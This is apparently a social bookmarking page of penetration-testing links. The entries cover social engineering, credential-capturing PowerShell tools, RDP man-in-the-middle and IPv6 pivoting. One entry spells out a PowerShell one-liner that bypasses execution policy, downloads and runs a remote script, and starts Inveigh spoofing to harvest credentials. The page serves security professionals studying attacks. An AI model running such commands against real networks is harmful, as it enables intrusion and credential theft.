pentest   3553

« earlier    

How I Socially Engineer Myself Into High Security Facilities
A good read on how to use social engineering.
TLDR - Use LinkedIn and Facebook and be plausible.
pentest  penetrationtesting  socialengineering  linkedin  facebook 
23 hours ago by drmeme
Invoke-PowerThIEf/ at master · nettitude/Invoke-PowerThIEf
Automatically scan any windows or tabs for login forms and then record what gets posted. A notification will appear when some have arrived.
ie  powershell  pentest  postexploitation 
yesterday by whip_lash
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
yesterday by whip_lash
Perform a MitM attack and extract clear text credentials from RDP connections

pentest  infosec  redteam  from twitter_favs
4 days ago by blackthorne
SANS Penetration Testing | Pen Test Poster: "White Board" - Bash - Useful IPv6 Pivot | SANS Institute
Pv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I've seen these settings result in critical security vulnerabilities including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.
ipv6  pentest  security 
7 days ago by whip_lash
Update to ProxyCannon — #_shellntel
We've cleaned up the number of arguments required to run the app from 6 to 3.  Now you only need to specify the AMI KEY, AMI ID, and the number instances you'd like start.
proxycannon  pentest 
9 days ago by whip_lash
Web Application Penetration Testing Cheat Sheet 

bugbounty  infosec  pentest  from twitter_favs
9 days ago by blackthorne

« earlier    

related tags

activedirectory  ad  agent  amsi  android  api  app  archive  authentication  authorization  automation  awesome  backtrack  ble  blog  bluetooth  bruteforce  bug  bugbounty  burp  c&c  c2  certification  cheatsheet  cheatsheets  checklist  ciberseguridad  cloud  collection  commandline  csrf  ctf  custom_search_engines  cybersecurity  database  deserialization  development  distribution  distro  docker  email  engineering  enumeration  ettercap  evasion  exfiltration  exploit  exploits  facebook  fuzzing  github  go  golang  goldenticket  google  guide  hacking  harden  hardening  hardware  hash  hashextension  http  hyper-v  ie  impacket  infosec  ios  iot  ips  ipv6  it_sicherheit  java  kali  linkedin  links  linux  list  lists  logging  merlin  metasploit  mimikatz  mindmap  mitm  mitre  mobile  mssql  mysql  nessus  network  networking  ntfs  ntlm  obfuscation  opencore  opensource  osint  owasp  penetration  penetrationtesting  pentesting  pivoting  platform  playground  plugin  postexploit  postexploitation  powershell  privesc  privilegeescalation  programming  proxycannon  python  recon  redteam  reference  relay  resources  responder  rest  reverse  reverseshell  router  scanner  script  scripting  secure  security  seguridad  server  smb  snmp  snmpv3  socialengineering  sql  ssdp  ssh  stealth  sudo  sysadmin  test  testing  tool  tools  training  upnp  vulnerabilities  vulnerability  vulnerable  web-based  web  webapp  webappsec  webdev  wifi  windows  wireless  xsrf  xss 

Copy this bookmark: